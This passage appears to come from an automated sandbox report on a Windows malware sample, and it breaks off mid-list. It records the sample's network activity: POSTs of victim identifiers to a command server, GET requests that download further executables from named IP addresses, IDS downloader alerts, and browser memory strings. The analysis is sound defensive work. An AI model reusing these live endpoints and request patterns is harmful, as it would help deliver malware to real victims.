Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010483001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010484001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010485001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49822 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49836 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49840 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49894 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49924 -> 31.41.244.11:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006EBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_006EBE30
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: --autocomplete-popup-separator-color--panel-banner-item-update-supported-bgcolor*://*.adsafeprotected.com/*/unit/**://www.facebook.com/platform/impression.php*executeIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8*://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Scheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttps://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://www.inbox.lv/rfc2368/?value=%sisDownloadsImprovementsAlreadyMigratedhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1 equals www.yahoo.com (Yahoo)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", 